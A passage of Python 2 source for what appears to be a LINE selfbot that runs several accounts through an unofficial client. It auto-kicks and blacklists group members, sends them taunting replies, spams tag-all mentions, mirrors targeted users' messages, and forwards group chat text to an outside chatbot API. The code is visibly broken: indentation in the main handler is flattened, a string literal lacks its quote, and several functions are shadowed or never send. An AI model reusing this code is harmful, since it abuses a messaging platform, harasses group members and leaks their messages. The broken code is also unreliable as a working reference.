    # meant to come from. The `client` parameter is unused: the upload goes
    # through the global kr1 account instead.
    config = {
        'album': album,
        'name': 'bot auto upload',
        'title': 'bot auto upload',
        'description': 'bot auto upload'
        }
    print("Uploading image... ")
    image = kr1.upload_from_path(image_path, config=config, anon=False)
    print("Done")
    print()
    return image
def sendMessage(to, text, contentMetadata={}, contentType=0):
    # Build a LINE Message addressed from this bot's profile and bump a
    # per-chat counter.
    # NOTE(review): `messageReq` is not defined anywhere in this file, so this
    # raises NameError when called - and the built message is never actually
    # transmitted. Also beware: the mutable default for contentMetadata is
    # shared across calls.
    mes = Message()
    mes.to, mes.from_ = to, profile.mid
    mes.text = text
    mes.contentType, mes.contentMetadata = contentType, contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def sendImage(self, to_, path):
    """Send the image at *path*: create an image message (contentType 1),
    then POST the media bytes against the returned message id.

    Raises Exception when the upload endpoint does not answer 201.
    """
    M = Message(to=to_,contentType = 1)
    M.contentMetadata = None
    M.contentPreview = None
    M_id = self.Talk.kr1.sendMessage(0,M).id
    files = {
        'file': open(path, 'rb'),
    }
    params = {
        'name': 'media',
        'oid': M_id,
        'size': len(open(path, 'rb').read()),  # NOTE(review): re-opens the file just for its size
        'type': 'image',
        'ver': '1.0',
    }
    data = {
        'params': json.dumps(params)
    }
    r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
    if r.status_code != 201:
        raise Exception('Upload image failure.')
    return True
def sendImageWithURL(self, to_, url):
    """Download the image at *url* into a temp file and send it via sendImage.

    Raises Exception when the download does not return HTTP 200; download or
    send errors propagate to the caller.
    """
    import shutil  # not imported at module level; needed for copyfileobj
    # fixed: bare `randint` was a NameError (only the `random` module is imported)
    path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
    r = requests.get(url, stream=True)
    if r.status_code == 200:
        # fixed: image payload is binary, so write in 'wb' rather than text mode
        with open(path, 'wb') as f:
            shutil.copyfileobj(r.raw, f)
    else:
        raise Exception('Download image failure.')
    try:
        self.sendImage(to_, path)
    except Exception as e:
        raise e
def restart_program():
    """Re-exec the current script in place with the same interpreter and argv."""
    interpreter = sys.executable
    os.execl(interpreter, interpreter, *sys.argv)
def post_content(self, urls, data=None, files=None):
    # Thin wrapper: POST through the client's HTTP session with its stored headers.
    return self._session.post(urls, headers=self._headers, data=data, files=files)
def NOTIFIED_READ_MESSAGE(op):
    # Record who has read messages in a watched chat.
    # op.param1 = chat/group id, op.param2 = reader's mid (per usage below).
    try:
        if op.param1 in wait2['readPoint']:
            Name = kr1.getContact(op.param2).displayName
            if Name in wait2['readMember'][op.param1]:
                pass  # this reader is already recorded for the chat
            else:
                # "9§9" acts as a separator token between recorded names.
                wait2['readMember'][op.param1] += "\n9§9" + Name
                wait2['ROM'][op.param1][op.param2] = "9§9" + Name
        else:
            pass
    except:
        # NOTE(review): bare except silently swallows every error (including
        # KeyError on missing wait2 entries) - consider narrowing.
        pass
def sendAudio(self, to_, path):
    """Send the audio file at *path*: create an audio message (contentType 3),
    then POST the media bytes against the returned message id.

    Raises Exception when the upload endpoint does not answer 201.
    """
    M = Message(to=to_, text=None, contentType = 3)
    M_id = self.Talk.kr1.sendMessage(0,M).id
    files = {
        'file': open(path, 'rb'),
    }
    params = {
        'name': 'media',
        'oid': M_id,
        'size': len(open(path, 'rb').read()),  # NOTE(review): re-opens the file just for its size
        'type': 'audio',
        'ver': '1.0',
    }
    data = {
        'params': json.dumps(params)
    }
    r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
    print r  # Python 2 print statement: dumps the raw upload response for debugging
    if r.status_code != 201:
        raise Exception('Upload audio failure.')
def sendAudioWithURL(self, to_, url):
    # NOTE(review): dead code - immediately shadowed by the second
    # sendAudioWithURL definition below. If ever revived, note that bare
    # `randint` is a NameError (only the `random` module is imported), that
    # `shutil` is never imported in this file, and that the binary audio
    # payload is written in text mode ('w').
    path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
    r = requests.get(url, stream=True)
    if r.status_code == 200:
        with open(path, 'w') as f:
            shutil.copyfileobj(r.raw, f)
    else:
        raise Exception('Download audio failure.')
    try:
        self.sendAudio(to_, path)
    except Exception as e:
        raise e
def sendAudioWithURL(self, to_, url):
    """Download the audio at *url* and send it via sendAudio.

    Shadows the earlier sendAudioWithURL definition above (this one wins).
    Raises Exception when the download does not return HTTP 200.
    """
    import shutil  # not imported at module level; needed for copyfileobj
    path = 'pythonLiness.data'
    r = requests.get(url, stream=True)
    if r.status_code == 200:
        # fixed: audio payload is binary, so write in 'wb' rather than text mode
        with open(path, 'wb') as f:
            shutil.copyfileobj(r.raw, f)
    else:
        raise Exception('Download Audio failure.')
    try:
        self.sendAudio(to_, path)
    except Exception as e:
        raise e
def sendVoice(self, to_, path):
    """Send *path* as a LINE voice message (contentType 3, name 'voice_message').

    Raises Exception when the upload endpoint does not answer 201.
    """
    M = Message(to=to_, text=None, contentType = 3)
    M.contentPreview = None
    M_id = self._kr1.sendMessage(0,M).id  # NOTE(review): other senders use self.Talk.kr1 - confirm which attribute is correct
    files = {
        'file': open(path, 'rb'),
    }
    params = {
        'name': 'voice_message',
        'oid': M_id,
        'size': len(open(path, 'rb').read()),
        'type': 'audio',
        'ver': '1.0',
    }
    data = {
        'params': json.dumps(params)
    }
    r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
    if r.status_code != 201:
        raise Exception('Upload voice failure.')
    return True
def sendVideoWithURL(self, to_, url):
    """Download the video at *url* and send it via sendVideo.

    Raises Exception when the download does not return HTTP 200.
    """
    import shutil  # not imported at module level; needed for copyfileobj
    path = 'pythonLines.data'
    r = requests.get(url, stream=True)
    if r.status_code == 200:
        # fixed: video payload is binary, so write in 'wb' rather than text mode
        with open(path, 'wb') as f:
            shutil.copyfileobj(r.raw, f)
    else:
        # fixed: the message said "Audio" in the video helper (copy-paste slip)
        raise Exception('Download video failure.')
    try:
        self.sendVideo(to_, path)
    except Exception as e:
        raise e
def mention(to,nama):
    """Send a "「Mention」" message that @-tags every mid listed in *nama*.

    LINE encodes mentions as (start, end) character offsets into the message
    text plus the target mid, serialized into contentMetadata['MENTION'].
    """
    aa = ""             # accumulates the JSON MENTIONEES entries
    bb = ""             # accumulates the visible "► @c" lines
    strt = int(12)      # offset bookkeeping for each @ tag - presumably tuned
    akh = int(12)       # to the "「Mention」\n" prefix length; verify if edited
    nm = nama
    #print nm
    for mm in nm:
        akh = akh + 2
        aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
        strt = strt + 6
        akh = akh + 4
        bb += "► @c \n"
    aa = (aa[:int(len(aa)-1)])  # drop the trailing comma
    msg = Message()
    msg.to = to
    msg.text = "「Mention」\n"+bb
    msg.contentMetadata = {'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
    #print msg
    try:
        kr1.sendMessage(msg)
    except Exception as error:
        print error
def summon(to, nama):
    """Tag-all helper: sends a box-framed message mentioning every mid in *nama*.

    The frame and "@x" lines are written as raw UTF-8 byte escapes
    (box-drawing characters); offsets follow the same scheme as mention().
    """
    aa = ""         # JSON MENTIONEES entries
    bb = ""         # visible mention lines ("╠ @x " in utf-8 escapes)
    strt = int(14)
    akh = int(14)
    nm = nama
    for mm in nm:
        akh = akh + 2
        aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
        strt = strt + 6
        akh = akh + 4
        bb += "\xe2\x95\xa0 @x \n"
    aa = (aa[:int(len(aa)-1)])  # drop the trailing comma
    msg = Message()
    msg.to = to
    msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
    msg.contentMetadata ={"MENTION":'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
    print "[Command] Tag All"
    try:
        kr1.sendMessage(msg)
    except Exception as error:
        print error
def removeAllMessages(self, lastMessageId):
    # Clear chat history up to lastMessageId via the underlying client.
    return self._kr1.removeAllMessages(0, lastMessageId)
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
    """Return True when *string* exactly matches an entry of *commands*,
    otherwise fall through (returning None), matching the original contract.

    The original iterated a 13-entry prefix table it never used, repeating
    the identical comparison 13 times; a single membership test is equivalent.
    """
    if string in commands:
        return True
def sendText(self, Tomid, text):
    # NOTE(review): builds a Message but never transmits it - as written this
    # function has no effect; confirm whether a send call is missing.
    msg = Message()
    msg.to = Tomid
    msg.text = text
def sendMessage(self, Tomid, msg):
    # NOTE(review): shadows the earlier module-level sendMessage(to, text, ...)
    # definition above. The `msg` parameter is immediately overwritten by a
    # fresh Message, and `msg.msg = msg` then points the object at itself -
    # nothing is ever sent. Likely broken; confirm intended behavior.
    msg = Message()
    msg.to = Tomid
    msg.msg = msg
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait['autoAdd'] == True:
kr1.findAndAddContactsByMid(op.param1)
if (wait['message'] in [""," ","\n",None]):
pass
else:
kr1.sendText(op.param1,str(wait['message']))
#==========================[WIB]===========================
if op.type == 26:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
kr1.sendText(msg.to,text)
#==========================[WIB]===========================
if op.type == 32:
if wait["Protectcancel"] == True:
if op.param2 in admin and Bots:
pass
if op.param2 not in admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#==========================[WIB]===========================
if op.type == 13:
if wait["Protectguest"] == True:
if op.param2 in admin and Bots:
pass
if op.param2 not in admin:
random.choice(KAC).cancelGroupInvitation(op.param1,[op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#==========================[WIB]===========================
if op.type == 19:
if wait["MProtection"] == True:
if op.param2 in admin and Bots:
pass
if op.param2 not in admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
#==========================[WIB]===========================
if op.type == 11:
if wait["QrProtect"] == True:
if op.param2 in admin and Bots:
pass
if op.param2 not in admin:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
kr1.updateGroup(G)
kr2.updateGroup(G)
if op.type == 11:
if wait["Protectgr"] == True:
if kr1.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
kr1.kickoutFromGroup(op.param1,[op.param2])
X = kr1.getGroup(op.param1)
X.preventJoinByTicket = True
kr1.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#==========================[WIB]===========================
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = kr1.getGroup(op.param1)
except:
try:
G = kr2.getGroup(op.param1)
except:
try:
G = kr3.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
kr1.updateGroup(G)
except:
try:
kr2.updateGroup(G)
except:
try:
kr3.updateGroup(G)
except:
pass
if op.param2 in admin or Bots:
pass
else:
try:
kr1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kr2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kr3.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kr1.sendText(op.param1,"please do not change group name-_-")
#==========================[WIB]===========================
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in admin or owner:
kr1.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in admin or owner:
kr2.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in admin or owner:
kr3.acceptGroupInvitation(op.param1)
#==========================[WIB]===========================
if op.param3 in mid:
if op.param2 in Amid:
kr1.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Bmid:
kr1.acceptGroupInvitation(op.param1)
#==========================[WIB]===========================
if op.param3 in Amid:
if op.param2 in mid:
kr2.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
kr2.acceptGroupInvitation(op.param1)
#==========================[WÌB]===========================
if op.param3 in Bmid:
if op.param2 in mid:
kr3.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
kr3.acceptGroupInvitation(op.param1)
#==========================[WIB]===========================
if op.type == 13:
if mid in op.param3:
if wait['autoJoin'] == True:
if op.param2 in admin or owner:
kr1.acceptGroupInvitation(op.param1)
else:
kr1.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait['autoJoin'] == True:
if op.param2 in admin or owner:
kr2.acceptGroupInvitation(op.param1)
else:
kr2.acceptGroupInvitation(op.param1)
kr2.kickoutFromGroup(op.param1,[op.param2])
kr2.leaveGroup(op.param1)
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait['autoJoin'] == True:
if op.param2 in admin or owner:
kr3.acceptGroupInvitation(op.param1)
else:
kr3.acceptGroupInvitation(op.param1)
kr3.kickoutFromGroup(op.param1,[op.param2])
kr3.leaveGroup(op.param1)
else:
print "autoJoin is Off"
#==========================[WIB]===========================
if op.type == 19:
if wait["autoKick"] == True:
if op.param2 in admin or Bots:
pass
else:
try:
kr3.kickoutFromGroup(op.param1,[op.param2])
kr1.inviteIntoGroup(op.param1,[op.param3])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admin or Bots:
pass
else:
wait["blacklist"][op.param2] = True
#==========================[WIB]===========================
if mid in op.param3:
if op.param2 in Bots or admin:
pass
else:
try:
kr2.kickoutFromGroup(op.param1,[op.param2])
kr3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = kr3.getGroup(op.param1)
G.preventJoinByTicket = False
kr3.updateGroup(G)
Ti = kr3.reissueGroupTicket(op.param1)
kr1.acceptGroupInvitationByTicket(op.param1,Ti)
kr2.acceptGroupInvitationByTicket(op.param1,Ti)
kr3.acceptGroupInvitationByTicket(op.param1,Ti)
G = kr1.getGroup(op.param1)
G.preventJoinByTicket = True
kr1.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots or admin:
pass
else:
try:
kr3.kickoutFromGroup(op.param1,[op.param2])
kr1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = kr1.getGroup(op.param1)
G.preventJoinByTicket = False
kr1.updateGroup(G)
Ti = kr1.reissueGroupTicket(op.param1)
kr1.acceptGroupInvitationByTicket(op.param1,Ti)
kr2.acceptGroupInvitationByTicket(op.param1,Ti)
kr3.acceptGroupInvitationByTicket(op.param1,Ti)
G = kr2.getGroup(op.param1)
G.preventJoinByTicket = True
kr2.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots or admin:
pass
else:
try:
kr1.kickoutFromGroup(op.param1,[op.param2])
kr2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = kr2.getGroup(op.param1)
G.preventJoinByTicket = False
kr2.updateGroup(G)
Ti = kr2.reissueGroupTicket(op.param1)
kr1.acceptGroupInvitationByTicket(op.param1,Ti)
kr2.acceptGroupInvitationByTicket(op.param1,Ti)
kr3.acceptGroupInvitationByTicket(op.param1,Ti)
G = kr3.getGroup(op.param1)
G.preventJoinByTicket = True
kr3.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#==========================[WIN]===========================
if op.type == 19:
if op.param3 in admin:
if op.param2 not in admin:
try:
kr3.kickoutFromGroup(op.param1,[op.param2])
kr1.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
if op.param3 not in admin:
if op.param2 not in admin:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param3 in admin:
if op.param2 in admin:
try:
kr1.inviteIntoGroup(op.param1,[op.param3])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
random.choice(KAC).inviteIntoGroup(op.param1,[admin])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
if op.type == 19:
if op.param3 in mid:
if op.param2 not in admin:
try:
kr3.kickoutFromGroup(op.param1,[op.param2])
mid = ["u0710a42a75e0a476ad687639db8c069c"]
midd1 = (mid)
kr2.findAndAddContactsByMid(midd1)
kr2.inviteIntoGroup(op.param1,[midd1])
kr1.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
mid = ["u0710a42a75e0a476ad687639db8c069c"]
midd1 = (mid)
random.choice(KAC).findAndAddContactsByMid(midd1)
random.choice(KAC).inviteIntoGroup(op.param1,[midd1])
kr1.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 not in admin:
try:
kr1.kickoutFromGroup(op.param1,[op.param2])
Amid = ["u0710a42a75e0a476ad687639db8c069c"]
midd2 = (Amid)
kr3.findAndAddContactsByMid(midd2)
kr3.inviteIntoGroup(op.param1,[midd2])
kr2.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Amid = ["u0710a42a75e0a476ad687639db8c069c"]
midd2 = (Amid)
random.choice(KAC).findAndAddContactsByMid(midd2)
random.choice(KAC).inviteIntoGroup(op.param1,[midd2])
kr2.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 not in admin:
try:
kr2.kickoutFromGroup(op.param1,[op.param2])
Bmid = [""]
midd3 = (Bmid)
kr1.findAndAddContactsByMid(midd3)
kr1.inviteIntoGroup(op.param1,[midd3])
kr3.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Bmid = [""]
midd3 = (Bmid)
random.choice(KAC).findAndAddContactsByMid(midd3)
random.choice(KAC).inviteIntoGroup(op.param1,[midd3])
kr3.acceptGroupInvitation(op.param1)
#==========================[WIB]===========================
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
#==========================[WIB]===========================
if op.type == 22:
if wait['leaveRoom'] == True:
kr1.leaveRoom(op.param1)
kr2.leaveRoom(op.param1)
kr3.leaveRoom(op.param1)
#==========================[WIB]===========================
if op.type == 24:
if wait['leaveRoom'] == True:
kr1.leaveRoom(op.param1)
kr2.leaveRoom(op.param1)
kr3.leaveRoom(op.param1)
#==========================[WIB]===========================
if op.type == 26:
msg = op.message
if msg.toType == 1:
if wait['leaveRoom'] == True:
kr1.leaveRoom(msg.to)
kr2.leaveRoom(msg.to)
kr3.leaveRoom(msg.to)
#==========================[WIB]===========================
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
kr1.like(url[25:58], url[66:], likeType=1001)
#==========================[WIB]===========================
if op.type == 26:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
kr1.sendText(msg.to,text)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data["status"] == 200:
if data['result']['result'] == 100:
kr1.sendText(msg.to, "[From Simi]\n" + data['result']['response'].encode('utf-8'))
#==========================[WIB]===========================
if op.type in [26,25]:
msg = op.message
if msg.contentType == 7:
if wait['stiker'] == True:
stk_id = msg.contentMetadata['STKID']
stk_ver = msg.contentMetadata['STKVER']
pkg_id = msg.contentMetadata['STKPKGID']
filler = "[Stiker Check] \nSTKID : %s\nSTKPKGID : %s \nSTKVER : %s\n =>> Link...\nline://shopdetail/%s"%(stk_id,pkg_id,stk_ver,pkg_id)
kr1.sendText(msg.to, filler)
else:
pass
#==========================[WIB]===========================
if op.type == 26:
msg = op.message
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['detectMention'] == True:
contact = kr1.getContact(msg.from_)
cName = contact.displayName
balas = [cName + ngetag mulu lu ngtd?",cName + " nah mending pc aja klo penting..!", "kenapa, ", cName + " kangen ya?","kangen bilang, gak usah ngetag mulu, " + cName, "Kalo gak ada urusan jangan ngetag ngtd " + cName, "Tuh kan" + cName + "Caper lu"]
ret_ = "[Auto Respon] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
kr1.sendText(msg.to,ret_)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "22926163",
"STKPKGID": "9800",
"STKVER": "1" }
kr1.sendMessage(msg)
break
#==========================[WIB]===========================
# "potoMention" toggle: when a bot account is @-mentioned, reply with the
# SENDER's profile picture (LINE CDN URL built from contact.pictureStatus).
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['potoMention'] == True:
contact = kr1.getContact(msg.from_)
cName = contact.pictureStatus
balas = ["http://dl.profile.line-cdn.net/" + cName]
ret_ = random.choice(balas)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention["MENTIONEES"]
for mention in mentionees:
if mention["M"] in Bots:
kr1.sendImageWithURL(msg.to,ret_)
break
#==========================[WIB]===========================
# "kickMention" toggle: when a bot account is @-mentioned, taunt the sender,
# kick them from the group, and invite the admin list back in.
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['kickMention'] == True:
contact = kr1.getContact(msg.from_)
cName = contact.displayName
balas = [cName + "ngetag mulu lu ngtd?",cName + " nah mending pc aja klo penting..!", "kenapa, ", cName + " kangen ya?","kangen bilang, gak usah ngetag mulu, " + cName, "Caper lu " + cName, "Tuh kan" + cName + "gak ada urusan gak usah ngetag ngtd"]
ret_ = "[Auto Respon] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
kr1.sendText(msg.to,ret_)
kr1.kickoutFromGroup(msg.to,[msg.from_])
# NOTE(review): `admin` is passed directly as the invitee list here —
# presumably already a list of mids; verify against its definition.
kr1.inviteIntoGroup(msg.to, admin)
break
#==========================[WIB]===========================
# "invite" / "invite2" modes: after the command arms the flag, the next
# contact card (contentType 13) shared in the room names the person to invite.
if op.type in [26,25]:
msg = op.message
if msg.contentType == 13:
if wait['invite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = kr1.getGroup(msg.to)
pending = groups.invitee
targets = []
# NOTE(review): this appends the SAME mid once per non-matching member,
# so `targets` holds duplicates; harmless only because the invite loop
# below breaks after the first iteration.
for s in groups.members:
if _name in s.displayName:
kr1.sendText(msg.to, _name + " Berada DiGrup Ini")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
kr1.findAndAddContactsByMid(target)
kr1.inviteIntoGroup(msg.to,[target])
kr1.sendText(msg.to,"Invite " + _name)
wait['invite'] = False
break
except:
kr1.sendText(msg.to,"Error")
wait['invite'] = False
break
# Same flow as above but a random helper account from KAC performs the invite.
if msg.contentType == 13:
if wait['invite2'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = random.choice(KAC).getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
random.choice(KAC).sendText(msg.to, _name + " Berada DiGrup Ini")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
random.choice(KAC).findAndAddContactsByMid(target)
random.choice(KAC).inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Invite2 " + _name)
wait['invite2'] = False
break
except:
random.choice(KAC).sendText(msg.to,"Error")
wait['invite2'] = False
break
#==========================[WIB]===========================
# "winvite" mode (kr1 account): the next shared contact card is invited into
# the group, unless already a member or blacklisted.
if op.type in [26,25]:
    msg = op.message
    if msg.contentType == 13:
        if wait["winvite"] == True:
            # FIX: the original gate was `if msg.from_ in admin or owner:`,
            # which Python parses as `(msg.from_ in admin) or bool(owner)` —
            # true for EVERY sender whenever `owner` is non-empty, so the
            # admin restriction never applied. Test membership in both lists.
            if msg.from_ in admin or msg.from_ in owner:
                _name = msg.contentMetadata["displayName"]
                invite = msg.contentMetadata["mid"]
                groups = kr1.getGroup(msg.to)
                pending = groups.invitee
                targets = []
                for s in groups.members:
                    if _name in s.displayName:
                        kr1.sendText(msg.to,"-> " + _name + " ada di room ini")
                        break
                    elif invite in wait["blacklist"]:
                        kr1.sendText(msg.to,"Maaf, " + _name + " kena Blacklist")
                        kr1.sendText(msg.to,"hubungi owner kami ya !, \n➡Unban: " + invite)
                        break
                    else:
                        targets.append(invite)
                if targets == []:
                    pass
                else:
                    for target in targets:
                        try:
                            kr1.findAndAddContactsByMid(target)
                            kr1.inviteIntoGroup(msg.to,[target])
                            kr1.sendText(msg.to,"Selesai di Invite : \n➡" + _name)
                            wait["winvite"] = False
                            break
                        except:
                            # Best-effort retry against op.param1 before
                            # reporting failure; the flag is cleared either way.
                            try:
                                kr1.findAndAddContactsByMid(invite)
                                kr1.inviteIntoGroup(op.param1,[invite])
                                wait["winvite"] = False
                            except:
                                kr1.sendText(msg.to,"Negative, Error detected")
                                wait["winvite"] = False
                            break
#==========================[WIB]===========================
# Duplicate of the "winvite" flow above, executed by the kr2 account.
# NOTE(review): `msg.from_ in admin or owner` parses as
# `(msg.from_ in admin) or bool(owner)` — true for everyone when `owner` is a
# non-empty list, so this gate is ineffective; intended fix is
# `msg.from_ in admin or msg.from_ in owner`.
if msg.from_ in admin or owner:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = kr2.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
kr2.sendText(msg.to,"-> " + _name + " ada di room ini")
break
elif invite in wait["blacklist"]:
kr2.sendText(msg.to,"Maaf, " + _name + " kena Blacklist")
kr2.sendText(msg.to,"hubungi owner kami ya !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
kr2.findAndAddContactsByMid(target)
kr2.inviteIntoGroup(msg.to,[target])
kr2.sendText(msg.to,"Selesai di Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
kr2.findAndAddContactsByMid(invite)
kr2.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
kr2.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
#==========================[WIB]===========================
# Contact-card driven admin actions (op.type 26, contentType 13): add/remove
# the shared contact's mid from the comment blacklist or the invite blacklist,
# or dump the contact's profile when 'contact' mode is on.
if op.type == 26:
msg = op.message
if msg.contentType == 13:
#==========================[WIB]===========================
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
kr1.sendText(msg.to,"In Blacklist")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
kr1.sendText(msg.to,"Nothing")
#==========================[WIB]===========================
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
kr1.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
kr1.sendText(msg.to,"Not in Blacklist")
#==========================[WIB]===========================
elif wait["wblacklist"] == True:
